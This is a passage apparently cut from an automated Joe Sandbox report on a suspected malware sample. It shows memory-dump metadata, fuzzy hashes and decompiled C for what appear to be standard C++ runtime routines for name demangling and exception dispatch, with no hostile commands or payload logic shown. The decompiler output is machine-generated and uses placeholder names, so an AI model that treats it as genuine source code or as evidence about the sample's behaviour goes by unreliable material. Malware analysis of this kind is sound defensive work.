                      • Associated: 00000000.00000002.296220091.0000000000B2F000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296243296.0000000000B30000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296264435.0000000000B34000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296303200.0000000000B36000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_940000_SecuriteInfo.jbxd
                      Similarity
                      • API ID: Mailbox$Name::operator+$Nameoperator+$DecoratedDecorator::getEmptyName::isName::operator=$Iterator_baseIterator_base::_Name::Name::operator+=std::_
                      • String ID: -$@$`anonymous namespace'
                      • API String ID: 625857421-2591561782
                      • Opcode ID: 996d392b48849075600854512d4a717ea421ce7827394c296585d712c558e8ab
                      • Instruction ID: e361c5f9a8181f915f21381449771052257c7cecca4c53a2a1b3c53ebe2e43f7
                      • Opcode Fuzzy Hash: 996d392b48849075600854512d4a717ea421ce7827394c296585d712c558e8ab
                      • Instruction Fuzzy Hash: DEF16271D44118ABDB14EFE0DCA2FEEB779AF94304F10816AE516A7191EB306B48CF91
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 100%
                      			E00965490(void* __ebx, void* __edi, void* __esi, intOrPtr _a4, intOrPtr _a8) {
                      				signed int _v8;
                      				char _v16;
                      				signed int _v20;
                      				signed int _v24;
                      				signed int _v28;
                      				signed int _v32;
                      				signed int _v36;
                      				intOrPtr _v40;
                      				intOrPtr _v44;
                      				intOrPtr _v48;
                      				intOrPtr _v52;
                      				intOrPtr _v56;
                      				char _v64;
                      				signed int _v68;
                      				char _v72;
                      				char _v80;
                      				char _v88;
                      				char _v96;
                      				char _v104;
                      				char _v112;
                      				char _v120;
                      				char _v128;
                      				char _v136;
                      				char _v144;
                      				char _v152;
                      				char _v160;
                      				char _v168;
                      				char _v176;
                      				char _v184;
                      				char _v192;
                      				char _v200;
                      				char _v208;
                      				char _v216;
                      				char _v224;
                      				char _v232;
                      				char _v240;
                      				char _v248;
                      				char _v256;
                      				char _v264;
                      				char _v272;
                      				signed int _t115;
                      				signed int _t117;
                      				signed int _t121;
                      				void* _t122;
                      				signed int _t124;
                      				void* _t131;
                      				signed int _t133;
                      				signed int _t134;
                      				signed int _t140;
                      				intOrPtr _t158;
                      				intOrPtr _t161;
                      				signed int _t165;
                      				void* _t166;
                      				intOrPtr _t170;
                      				void* _t172;
                      				signed int _t174;
                      				signed int _t180;
                      				void* _t183;
                      				void* _t186;
                      				void* _t190;
                      				void* _t194;
                      				intOrPtr _t197;
                      				signed int _t207;
                      				signed int _t211;
                      				void* _t215;
                      				signed int _t217;
                      				signed int _t218;
                      				signed int _t251;
                      				signed int _t252;
                      				signed int _t254;
                      				signed int _t265;
                      				signed int _t270;
                      				signed int _t274;
                      				signed int _t286;
                      				signed int _t290;
                      				signed int _t293;
                      				void* _t298;
                      				void* _t299;
                      				void* _t300;
                      				void* _t301;
                      				void* _t313;
                      
                      				_t299 = __esi;
                      				_t298 = __edi;
                      				_t215 = __ebx;
                      				_t115 =  *0xb30640; // 0x0
                      				_t317 =  *_t115;
                      				if( *_t115 != 0) {
                      					_t217 =  *0xb30640; // 0x0
                      					__eflags =  *_t217 - 0x36;
                      					if( *_t217 < 0x36) {
                      						L4:
                      						_t270 =  *0xb30640; // 0x0
                      						__eflags =  *_t270 - 0x5f;
                      						if( *_t270 == 0x5f) {
                      							L6:
                      							_t218 =  *0xb30640; // 0x0
                      							_v32 =  *_t218 - 0x36;
                      							_t117 =  *0xb30640; // 0x0
                      							 *0xb30640 = _t117 + 1;
                      							_v8 = _v32;
                      							__eflags = _v8 - 0x29;
                      							if(_v8 != 0x29) {
                      								__eflags = _v8;
                      								if(_v8 < 0) {
                      									L16:
                      									_v8 = 0xffffffff;
                      									L17:
                      									__eflags = _v8 - 0xffffffff;
                      									if(_v8 != 0xffffffff) {
                      										E0095F3F0( &_v64);
                      										_t222 =  &_v16;
                      										E0095F240( &_v16, _a8);
                      										_t274 = _v8 & 0x00000002;
                      										__eflags = _t274;
                      										if(_t274 == 0) {
                      											L35:
                      											_t276 = _v8 & 0x00000004;
                      											__eflags = _v8 & 0x00000004;
                      											if((_v8 & 0x00000004) != 0) {
                      												_t165 = E00962230(_t222);
                      												__eflags = _t165;
                      												if(_t165 == 0) {
                      													_t166 = E00962BE0(_t215,  &_v168, _t276, _t298, _t299,  &_v168);
                      													_t300 = _t300 + 4;
                      													_t222 =  &_v16;
                      													E00960000( &_v16, __eflags, _t166);
                      												} else {
                      													_t170 = E0095FAD0( &_v152, 0x20, E00962BE0(_t215, _t222, _t276, _t298, _t299,  &_v144));
                      													_t300 = _t300 + 0x10;
                      													_v44 = _t170;
                      													_t172 = E0095FB70(_v44,  &_v160,  &_v16);
                      													_t222 =  &_v16;
                      													E0095F820( &_v16, _t172);
                      												}
                      											}
                      											_t121 = E00962230(_t222);
                      											__eflags = _t121;
                      											if(_t121 == 0) {
                      												_t122 = E009637C0( &_v192);
                      												_t301 = _t300 + 4;
                      												E00960000( &_v16, __eflags, _t122);
                      											} else {
                      												_t161 = E009637C0( &_v176);
                      												_t301 = _t300 + 4;
                      												_v48 = _t161;
                      												E0095F820( &_v16, E0095FB70(_v48,  &_v184,  &_v16));
                      											}
                      											_t124 = E0096A560(_a8);
                      											__eflags = _t124;
                      											if(_t124 == 0) {
                      												_t158 = E0095FAD0( &_v200, 0x28,  &_v16);
                      												_t301 = _t301 + 0xc;
                      												_v52 = _t158;
                      												E0095F820( &_v16, E0095FBB0(_v52,  &_v208, 0x29));
                      											}
                      											_v24 = E0095F7A0(8, 0xb3065c, 0);
                      											__eflags = _v24;
                      											if(_v24 == 0) {
                      												_v28 = 0;
                      											} else {
                      												_v28 = E0095F3F0(_v24);
                      											}
                      											_v20 = _v28;
                      											E00967550(_t215, _t298, _t299,  &_v80, _v20);
                      											_v56 = E0095FAD0( &_v224, 0x28, E009625F0(_t215, _t298, _t299,  &_v216));
                      											_t131 = E0095FBB0(_v56,  &_v232, 0x29);
                      											_t228 =  &_v16;
                      											E0095FD40( &_v16, _t131);
                      											_t133 = E00962380( &_v16);
                      											__eflags = _t133;
                      											if(_t133 != 0) {
                      												__eflags = _v8 & 0x00000002;
                      												if((_v8 & 0x00000002) != 0) {
                      													_t228 =  &_v16;
                      													E0095FD40( &_v16,  &_v64);
                      												}
                      											}
                      											_t134 = E00962350(_t228);
                      											__eflags = _t134;
                      											if(_t134 == 0) {
                      												E00960000( &_v16, __eflags, E00967390( &_v248));
                      											} else {
                      												E0095FD40( &_v16, E00967390( &_v240));
                      											}
                      											E0095FD40( &_v16, E00965D00( &_v256));
                      											_t140 = E009623B0( &_v16);
                      											__eflags = _t140;
                      											if(_t140 == 0) {
                      												E00960000( &_v16, __eflags, E00968EE0( &_v272));
                      											} else {
                      												E0095FD40( &_v16, E00968EE0( &_v264));
                      											}
                      											__eflags = _v20;
                      											if(_v20 == 0) {
                      												E0095F350(_a4, 3);
                      												return _a4;
                      											} else {
                      												E0095F820(_v20,  &_v16);
                      												E0095F240(_a4,  &_v80);
                      												return _a4;
                      											}
                      										}
                      										_t174 =  *0xb30640; // 0x0
                      										__eflags =  *_t174 - 0x40;
                      										if( *_t174 == 0x40) {
                      											_t251 =  *0xb30640; // 0x0
                      											_t252 = _t251 + 1;
                      											__eflags = _t252;
                      											 *0xb30640 = _t252;
                      										} else {
                      											_v72 = E00960060("::", 2);
                      											_v68 = _t274;
                      											_t190 = E0095FAA0( &_v88,  &_v72,  &_v16);
                      											_t313 = _t300 + 0x14;
                      											E0095F820( &_v16, _t190);
                      											_t290 =  *0xb30640; // 0x0
                      											__eflags =  *_t290;
                      											if(__eflags == 0) {
                      												_t194 = E0095FB00(__eflags,  &_v120, 1,  &_v16);
                      												_t300 = _t313 + 0xc;
                      												E0095F820( &_v16, _t194);
                      											} else {
                      												_t197 = E0095FAD0( &_v104, 0x20, E009675A0(_t215, _t298, _t299, __eflags,  &_v96));
                      												_t300 = _t313 + 0x10;
                      												_v40 = _t197;
                      												E0095F820( &_v16, E0095FB70(_v40,  &_v112,  &_v16));
                      											}
                      										}
                      										_t286 =  *0xb30640; // 0x0
                      										__eflags =  *_t286;
                      										if(__eflags == 0) {
                      											E0095FB00(__eflags, _a4, 1,  &_v16);
                      											return _a4;
                      										} else {
                      											_t254 =  *0xb30640; // 0x0
                      											__eflags =  *_t254 - 0x40;
                      											if( *_t254 != 0x40) {
                      												E0095F350(_a4, 2);
                      												return _a4;
                      											}
                      											_t180 =  *0xb30640; // 0x0
                      											 *0xb30640 = _t180 + 1;
                      											__eflags = E00962380(_t254);
                      											if(__eflags == 0) {
                      												_t183 = E00968EA0(_t215, _t298, _t299,  &_v136);
                      												_t300 = _t300 + 4;
                      												_t222 =  &_v64;
                      												E00960000( &_v64, __eflags, _t183);
                      											} else {
                      												_t186 = E00968EA0(_t215, _t298, _t299,  &_v128);
                      												_t300 = _t300 + 4;
                      												_t222 =  &_v64;
                      												E0095F820( &_v64, _t186);
                      											}
                      											goto L35;
                      										}
                      									}
                      									E0095F350(_a4, 2);
                      									return _a4;
                      								}
                      								__eflags = _v8 - 3;
                      								if(_v8 <= 3) {
                      									goto L17;
                      								}
                      								goto L16;
                      							}
                      							_t293 =  *0xb30640; // 0x0
                      							__eflags =  *_t293;
                      							if(__eflags == 0) {
                      								E0095FB00(__eflags, _a4, 1, _a8);
                      								return _a4;
                      							}
                      							_t265 =  *0xb30640; // 0x0
                      							_v36 =  *_t265 - 0x3d;
                      							_t207 =  *0xb30640; // 0x0
                      							 *0xb30640 = _t207 + 1;
                      							_v8 = _v36;
                      							__eflags = _v8 - 4;
                      							if(_v8 < 4) {
                      								L10:
                      								_v8 = 0xffffffff;
                      								L11:
                      								goto L17;
                      							}
                      							__eflags = _v8 - 7;
                      							if(_v8 <= 7) {
                      								goto L11;
                      							}
                      							goto L10;
                      						}
                      						E0095F350(_a4, 2);
                      						return _a4;
                      					}
                      					_t211 =  *0xb30640; // 0x0
                      					__eflags =  *_t211 - 0x39;
                      					if( *_t211 <= 0x39) {
                      						goto L6;
                      					}
                      					goto L4;
                      				}
                      				E0095FB00(_t317, _a4, 1, _a8);
                      				return _a4;
                      			}

                      APIs
                      • operator+.LIBVCRUNTIMED ref: 009654AF
                        • Part of subcall function 0095FB00: DName::DName.LIBVCRUNTIMED ref: 0095FB0D
                        • Part of subcall function 0095FB00: DName::operator+.LIBCMTD ref: 0095FB20
                      • DName::DName.LIBVCRUNTIMED ref: 009654ED
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.282500177.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                      • Associated: 00000000.00000002.282260111.0000000000940000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.284025026.00000000009D6000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.293211865.0000000000A06000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.293421290.0000000000A07000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296220091.0000000000B2F000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296243296.0000000000B30000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296264435.0000000000B34000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296303200.0000000000B36000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_940000_SecuriteInfo.jbxd
                      Similarity
                      • API ID: NameName::$Name::operator+operator+
                      • String ID: )
                      • API String ID: 308612335-2427484129
                      • Opcode ID: 338ac7123ea464330fefebe50895a956cb32430da7a51fe407a1eeba22ccce01
                      • Instruction ID: 50af378e7f7ae79373976db695ec2abbade606f0195ed710239bab469502752e
                      • Opcode Fuzzy Hash: 338ac7123ea464330fefebe50895a956cb32430da7a51fe407a1eeba22ccce01
                      • Instruction Fuzzy Hash: 3BE173B1D00508EBDB14EFA0DCA2FEE7779AF84315F548169F916A7151EB30AB08CB91
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 95%
                      			E0095CD60(void* __ebx, void* __edi, void* __esi, signed int _a4, intOrPtr _a8, signed int _a12, intOrPtr _a16, signed int _a20, signed int _a24, intOrPtr _a28, intOrPtr _a32) {
                      				signed int _v5;
                      				intOrPtr _v12;
                      				intOrPtr _v16;
                      				intOrPtr* _v20;
                      				intOrPtr _v24;
                      				char* _v28;
                      				intOrPtr _v32;
                      				intOrPtr _v36;
                      				char _v40;
                      				char _v48;
                      				char _v56;
                      				char _v64;
                      				char _v72;
                      				char _v80;
                      				intOrPtr _v84;
                      				char _v88;
                      				intOrPtr _v104;
                      				char _v108;
                      				char _v124;
                      				char _v136;
                      				void* __ebp;
                      				intOrPtr _t170;
                      				void* _t175;
                      				void* _t184;
                      				void* _t189;
                      				void* _t192;
                      				void* _t203;
                      				signed char _t209;
                      				signed char _t213;
                      				void* _t214;
                      				void* _t236;
                      				void* _t245;
                      				signed char _t254;
                      				signed char _t255;
                      				void* _t265;
                      				void* _t266;
                      				void* _t352;
                      				void* _t353;
                      				void* _t354;
                      				void* _t355;
                      				void* _t357;
                      				void* _t358;
                      
                      				_t353 = __esi;
                      				_t352 = __edi;
                      				_t266 = __ebx;
                      				_v5 = 0;
                      				_v12 = 0xffffffff;
                      				_t267 = _a16;
                      				_t170 = E0096B4A0(_a8, _a16, _a20);
                      				_t355 = _t354 + 0xc;
                      				_v12 = _t170;
                      				if(_v12 < 0xffffffff) {
                      					L3:
                      					L009A0DE0(_t266, _t267, _t352, _t353);
                      					L4:
                      					if( *_a4 != 0xe06d7363 ||  *((intOrPtr*)(_a4 + 0x10)) != 3 ||  *((intOrPtr*)(_a4 + 0x14)) != 0x19930520 &&  *((intOrPtr*)(_a4 + 0x14)) != 0x19930521 &&  *((intOrPtr*)(_a4 + 0x14)) != 0x19930522) {
                      						L27:
                      						E0095D6F0( &_v56, _a20, 0);
                      						if( *_a4 != 0xe06d7363 ||  *((intOrPtr*)(_a4 + 0x10)) != 3 ||  *((intOrPtr*)(_a4 + 0x14)) != 0x19930520 &&  *((intOrPtr*)(_a4 + 0x14)) != 0x19930521 &&  *((intOrPtr*)(_a4 + 0x14)) != 0x19930522) {
                      							_t270 =  &_v56;
                      							if(E0095E140( &_v56) > 0) {
                      								if((_a24 & 0x000000ff) != 0) {
                      									L009A0DE0(_t266,  &_v56, _t352, _t353);
                      								}
                      								_t270 = _a4;
                      								E0095D280(_t266, _a4, _t352, _a4, _a8, _a12, _a16, _a20, _v12, _a28, _a32);
                      							}
                      							goto L74;
                      						} else {
                      							_t270 =  &_v56;
                      							if(E0095E140( &_v56) <= 0) {
                      								_t184 = E0095E130(_a20);
                      								_t357 = _t355 + 4;
                      								if(_t184 < 0x19930521) {
                      									L55:
                      									L009A0DE0(_t266, _t270, _t352, _t353);
                      									L56:
                      									if((_a24 & 0x000000ff) != 0) {
                      										_push(1);
                      										_t270 = _a4;
                      										E0095B0E0(_a4);
                      										_t357 = _t357 + 8;
                      									}
                      									if(( *_a20 & 0x1fffffff) < 0x19930521) {
                      										L69:
                      										L74:
                      										_t175 = E0095C670(_t266, _t270, _t352, _t353);
                      										if( *((intOrPtr*)(_t175 + 0x1c)) != 0) {
                      											return L009A0DE0(_t266, _t270, _t352, _t353);
                      										}
                      										return _t175;
                      									} else {
                      										_t270 = _a20;
                      										_t189 = E0095E100(_a20);
                      										_t358 = _t357 + 4;
                      										if(_t189 != 0) {
                      											L62:
                      											_t273 = _a20;
                      											if((E0095E190(_a20, _a20) & 0x000000ff) != 0) {
                      												 *((intOrPtr*)(E0095C670(_t266, _t273, _t352, _t353) + 0x10)) = _a4;
                      												 *((intOrPtr*)(E0095C670(_t266, _a4, _t352, _t353) + 0x14)) = _a12;
                      												E00999BF0(_a4);
                      											}
                      											_t192 = E0095E100(_a20);
                      											_t270 = _a4;
                      											if((L0095DF20(_t266, _t352, _t353, _a4, _t192) & 0x000000ff) == 0) {
                      												 *((intOrPtr*)(E0095C670(_t266, _t270, _t352, _t353) + 0x10)) = _a4;
                      												 *((intOrPtr*)(E0095C670(_t266, _a4, _t352, _t353) + 0x14)) = _a12;
                      												if(_a32 != 0) {
                      													E00959970(_a32, _a4);
                      												} else {
                      													E00959970(_a8, _a4);
                      												}
                      												E0095DD70(_a8, _a16, _a20);
                      												E0095DC70(_t266, _a20, _t352, _t353, E0095E100(_a20));
                      												 *((intOrPtr*)(E0095C670(_t266, _a20, _t352, _t353) + 0x10)) = _a4;
                      												_t203 = E0095C670(_t266, _a20, _t352, _t353);
                      												_t270 = _a12;
                      												 *((intOrPtr*)(_t203 + 0x14)) = _a12;
                      											}
                      											goto L69;
                      										}
                      										_t209 = E0095E190(_t270, _a20);
                      										_t358 = _t358 + 4;
                      										if((_t209 & 0x000000ff) == 0 || _a28 != 0) {
                      											goto L69;
                      										} else {
                      											goto L62;
                      										}
                      									}
                      								}
                      								_t213 = E0095E190( &_v56, _a20);
                      								_t357 = _t357 + 4;
                      								_t270 = _t213 & 0x000000ff;
                      								if((_t213 & 0x000000ff) != 0) {
                      									L54:
                      									goto L56;
                      								}
                      								_t214 = E0095E100(_a20);
                      								_t357 = _t357 + 4;
                      								if(_t214 == 0) {
                      									goto L55;
                      								}
                      								goto L54;
                      							}
                      							E009596D0(_t266, _t352, _t353,  &_v88,  &_v56, _v12, _a16, _a20, _a28);
                      							_t357 = _t355 + 0x18;
                      							_v40 = _v88;
                      							_v36 = _v84;
                      							while(1) {
                      								_t270 =  &_v40;
                      								if((E0095D950( &_v40,  &_v80) & 0x000000ff) == 0) {
                      									break;
                      								}
                      								E0095D8C0( &_v40,  &_v108);
                      								if(_v108 > _v12 || _v12 > _v104) {
                      									goto L34;
                      								} else {
                      									_push(0);
                      									_push(0);
                      									E0095D6C0( &_v64,  &_v108);
                      									_v28 =  &_v64;
                      									E0095E0B0(_v28,  &_v48);
                      									E0095E0D0(_v28,  &_v72);
                      									while((E0095D840( &_v48,  &_v72) & 0x000000ff) != 0) {
                      										E0095D880( &_v48,  &_v124);
                      										_v20 =  *((intOrPtr*)( *((intOrPtr*)(_a4 + 0x1c)) + 0xc)) + 4;
                      										_v16 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_a4 + 0x1c)) + 0xc))));
                      										while(_v16 > 0) {
                      											_v32 =  *_v20;
                      											_t236 = E0095E030( &_v124, _v32,  *((intOrPtr*)(_a4 + 0x1c)));
                      											_t357 = _t357 + 0xc;
                      											if(_t236 != 0) {
                      												_push(_a24 & 0x000000ff);
                      												_push(_v5 & 0x000000ff);
                      												E0095CC90(_a4, _a8, _a12, _a16, _a20,  &_v124, _v32,  &_v108, _a28, _a32);
                      												_t357 = _t357 + 0x30;
                      												goto L49;
                      											}
                      											_v16 = _v16 - 1;
                      											_v20 = _v20 + 4;
                      										}
                      										E0095D910( &_v48);
                      									}
                      									L49:
                      									L34:
                      									E0095D930( &_v40);
                      									continue;
                      								}
                      							}
                      							goto L56;
                      						}
                      					} else {
                      						_t307 = _a4;
                      						if( *((intOrPtr*)(_a4 + 0x1c)) != 0) {
                      							goto L27;
                      						}
                      						_t245 = E0095C670(_t266, _t307, _t352, _t353);
                      						if( *((intOrPtr*)(_t245 + 0x10)) == 0) {
                      							return _t245;
                      						}
                      						_a4 =  *((intOrPtr*)(E0095C670(_t266, _t307, _t352, _t353) + 0x10));
                      						_a12 =  *(E0095C670(_t266, _t307, _t352, _t353) + 0x14);
                      						_v5 = 1;
                      						if(_a4 == 0) {
                      							L20:
                      							L009A0DE0(_t266, _t307, _t352, _t353);
                      							L21:
                      							if( *((intOrPtr*)(E0095C670(_t266, _t307, _t352, _t353) + 0x1c)) != 0) {
                      								_v24 =  *((intOrPtr*)(E0095C670(_t266, _t307, _t352, _t353) + 0x1c));
                      								 *((intOrPtr*)(E0095C670(_t266,  *((intOrPtr*)(E0095C670(_t266, _t307, _t352, _t353) + 0x1c)), _t352, _t353) + 0x1c)) = 0;
                      								_t254 = L0095DF20(_t266, _t352, _t353, _a4, _v24);
                      								_t355 = _t355 + 8;
                      								_t309 = _t254 & 0x000000ff;
                      								if((_t254 & 0x000000ff) == 0) {
                      									_t255 = E0095DFD0(_v24);
                      									_t355 = _t355 + 4;
                      									if((_t255 & 0x000000ff) == 0) {
                      										E00999BF0(_t309);
                      									} else {
                      										_push(1);
                      										E0095B0E0(_a4);
                      										_t355 = _t355 + 8;
                      										E0095D750( &_v136);
                      										E0095BE10( &_v136, 0xa03bbc);
                      									}
                      								}
                      							}
                      							goto L27;
                      						}
                      						_t307 = _a4;
                      						if( *_a4 != 0xe06d7363 ||  *((intOrPtr*)(_a4 + 0x10)) != 3) {
                      							L19:
                      							goto L21;
                      						} else {
                      							if( *((intOrPtr*)(_a4 + 0x14)) == 0x19930520) {
                      								L18:
                      								if( *((intOrPtr*)(_a4 + 0x1c)) == 0) {
                      									goto L20;
                      								}
                      								goto L19;
                      							}
                      							_t307 = _a4;
                      							if( *((intOrPtr*)(_a4 + 0x14)) == 0x19930521 ||  *((intOrPtr*)(_a4 + 0x14)) == 0x19930522) {
                      								goto L18;
                      							} else {
                      								goto L19;
                      							}
                      						}
                      					}
                      				}
                      				_t267 = _a16;
                      				_t265 = L0095DF10(_a16, _a20);
                      				_t355 = _t355 + 8;
                      				if(_v12 >= _t265) {
                      					goto L3;
                      				} else {
                      					goto L4;
                      				}
                      			}


                      APIs
                      • ___vcrt_getptd.LIBVCRUNTIMED ref: 0095CDFE
                      • ___vcrt_getptd.LIBVCRUNTIMED ref: 0095CE0E
                      • ___vcrt_getptd.LIBVCRUNTIMED ref: 0095CE19
                      • ___vcrt_getptd.LIBVCRUNTIMED ref: 0095CE76
                      • ___vcrt_getptd.LIBVCRUNTIMED ref: 0095CE81
                      • ___vcrt_getptd.LIBVCRUNTIMED ref: 0095CE8C
                      • Is_bad_exception_allowed.LIBVCRUNTIMED ref: 0095CEB5
                        • Part of subcall function 0095DFD0: type_info::operator==.LIBVCRUNTIMED ref: 0095E00D
                      • ___DestructExceptionObject.LIBCMTD ref: 0095CECA
                      • std::bad_alloc::bad_alloc.LIBCMTD ref: 0095CED8
                        • Part of subcall function 0095D750: std::exception::exception.LIBCMTD ref: 0095D761
                        • Part of subcall function 0095BE10: RaiseException.KERNEL32(E06D7363,00000001,00000003,?), ref: 0095BEAA
                      • _Smanip.LIBCPMTD ref: 0095CEFE
                      • __FrameHandler3::HandlerMap::iterator::operator++.LIBVCRUNTIMED ref: 0095CF88
                      • weak_ptr.LIBCPMTD ref: 0095CFDF
                      • __FrameHandler3::HandlerMap::end.LIBVCRUNTIMED ref: 0095CFEB
                      • __FrameHandler3::HandlerMap::iterator::operator++.LIBVCRUNTIMED ref: 0095CFF5
                      • Concurrency::details::HardwareAffinity::operator!=.LIBCMTD ref: 0095D001
                      • CatchIt.LIBCMTD ref: 0095D0AB
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.282500177.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                      • Associated: 00000000.00000002.282260111.0000000000940000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.284025026.00000000009D6000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.293211865.0000000000A06000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.293421290.0000000000A07000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296220091.0000000000B2F000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296243296.0000000000B30000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296264435.0000000000B34000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296303200.0000000000B36000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_940000_SecuriteInfo.jbxd
                      Similarity
                      • API ID: ___vcrt_getptd$FrameHandlerHandler3::$ExceptionMap::iterator::operator++$Affinity::operator!=CatchConcurrency::details::DestructHardwareIs_bad_exception_allowedMap::endObjectRaiseSmanipstd::bad_alloc::bad_allocstd::exception::exceptiontype_info::operator==weak_ptr
                      • String ID: csm$csm$csm
                      • API String ID: 2995349249-393685449
                      • Opcode ID: 866dd8ae060feb842cd8e002a8f16b0539daf1b6d69e9a97806facd2ca3e3e91
                      • Instruction ID: a8a1f253278af43e899c2275bf87b7bec8fa5a819e9f8c6d48ca27577fe20a8e
                      • Opcode Fuzzy Hash: 866dd8ae060feb842cd8e002a8f16b0539daf1b6d69e9a97806facd2ca3e3e91
                      • Instruction Fuzzy Hash: E3F194B5901209DFCB18DFA6D881AEE7779BF94302F108518FC159B241DB35EE89CBA1
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 100%
                      			E00962CD0(signed int _a4, signed int _a8) {
                      				char _v12;
                      				signed int _v13;
                      				signed int _v14;
                      				void* _v15;
                      				void* _v16;
                      				signed int _v20;
                      				signed int _v24;
                      				signed int _v28;
                      				signed int _v32;
                      				signed int _v36;
                      				char _v44;
                      				char _v52;
                      				char _v60;
                      				signed int _v64;
                      				char _v68;
                      				signed int _v72;
                      				char _v76;
                      				signed int _v80;
                      				char _v84;
                      				signed int _v88;
                      				char _v92;
                      				signed int _v96;
                      				char _v100;
                      				signed int _v104;
                      				char _v108;
                      				signed int _v112;
                      				char _v116;
                      				signed int _v120;
                      				char _v124;
                      				signed int _v128;
                      				char _v132;
                      				signed int _v136;
                      				char _v140;
                      				signed int _v144;
                      				char _v148;
                      				signed int _v152;
                      				char _v156;
                      				signed int _v160;
                      				char _v164;
                      				signed int _v168;
                      				char _v172;
                      				signed int _v176;
                      				char _v180;
                      				signed int _v184;
                      				char _v188;
                      				signed int _v192;
                      				char _v196;
                      				signed int _v200;
                      				char _v204;
                      				signed int _v208;
                      				char _v212;
                      				signed int _v216;
                      				char _v220;
                      				signed int _v224;
                      				char _v228;
                      				signed int _v232;
                      				char _v236;
                      				signed int _v240;
                      				char _v244;
                      				signed int _v248;
                      				char _v252;
                      				signed int _v256;
                      				char _v260;
                      				void* _v264;
                      				void* _v268;
                      				intOrPtr _v272;
                      				char _v276;
                      				signed int _v280;
                      				char _v284;
                      				intOrPtr _v288;
                      				char _v292;
                      				signed int _v296;
                      				char _v300;
                      				char _v308;
                      				char _v316;
                      				char _v324;
                      				char _v332;
                      				char _v340;
                      				void* _v348;
                      				char _v356;
                      				signed int _t219;
                      				signed int _t225;
                      				void* _t227;
                      				signed int _t229;
                      				signed int _t232;
                      				char _t236;
                      				char _t239;
                      				char _t243;
                      				signed int _t248;
                      				signed int _t273;
                      				signed int _t309;
                      				signed int _t310;
                      				signed int _t313;
                      				char* _t314;
                      				char* _t315;
                      				signed int _t318;
                      				void* _t321;
                      				void* _t323;
                      
                      				_t219 =  *0xb30640; // 0x0
                      				if( *_t219 == 0) {
                      					E0095FB00(__eflags, _a4, 1, _a8);
                      					return _a4;
                      				}
                      				_t309 =  *0xb30640; // 0x0
                      				_v15 =  *_t309;
                      				_t273 =  *0xb30640; // 0x0
                      				 *0xb30640 = _t273 + 1;
                      				_t310 = _v15;
                      				_v13 = _t310;
                      				_v14 = 0;
                      				_v20 = 0xffffffff;
                      				E0095F3F0( &_v12);
                      				_v24 = _v13 & 0x000000ff;
                      				_v24 = _v24 - 0x43;
                      				if(_v24 > 0x1c) {
                      					L35:
                      					_t225 =  *0xb30640; // 0x0
                      					 *0xb30640 = _t225 - 1;
                      					_t227 = E00964C20(_t310,  &_v324);
                      					_t323 = _t321 + 4;
                      					E0095F820( &_v12, _t227);
                      					_t229 = E0096A560( &_v12);
                      					__eflags = _t229;
                      					if(_t229 == 0) {
                      						L37:
                      						if(_v20 != 0xffffffff) {
                      							E0095F3F0( &_v44);
                      							E0095F240( &_v60, _a8);
                      							__eflags = _v20 - 0xfffffffe;
                      							if(_v20 != 0xfffffffe) {
                      								_t232 = E0096A560(_a8);
                      								__eflags = _t232;
                      								if(_t232 != 0) {
                      									__eflags = _v20 & 0x00000001;
                      									if((_v20 & 0x00000001) == 0) {
                      										_t313 = _v20 & 0x00000002;
                      										__eflags = _t313;
                      										if(_t313 != 0) {
                      											_t236 = E00960060("volatile", 8);
                      											_t323 = _t323 + 8;
                      											_v300 = _t236;
                      											_v296 = _t313;
                      											E0095F7E0( &_v44,  &_v300);
                      										}
                      									} else {
                      										_t239 = E00960060("const", 5);
                      										_t323 = _t323 + 8;
                      										_v284 = _t239;
                      										_v280 = _t310;
                      										_t314 =  &_v284;
                      										E0095F7E0( &_v44, _t314);
                      										__eflags = _v20 & 0x00000002;
                      										if((_v20 & 0x00000002) != 0) {
                      											_t243 = E00960060(" volatile", 9);
                      											_t323 = _t323 + 8;
                      											_v292 = _t243;
                      											_v288 = _t314;
                      											E0095FCA0( &_v44,  &_v292);
                      										}
                      									}
                      								}
                      								E00966A70(_a4,  &_v44,  &_v60);
                      								return _a4;
                      							}
                      							E0096AA80( &_v60);
                      							_t315 =  &_v60;
                      							E00966A90( &_v52,  &_v44, _t315);
                      							_t248 = E0096A520( &_v52);
                      							__eflags = _t248;
                      							if(_t248 == 0) {
                      								_v276 = E00960060(0x9d8da8, 2);
                      								_v272 = _t315;
                      								E0095FCA0( &_v52,  &_v276);
                      							}
                      							E0095F240(_a4,  &_v52);
                      							return _a4;
                      						}
                      						_v28 = _v13 & 0x000000ff;
                      						_v28 = _v28 - 0x43;
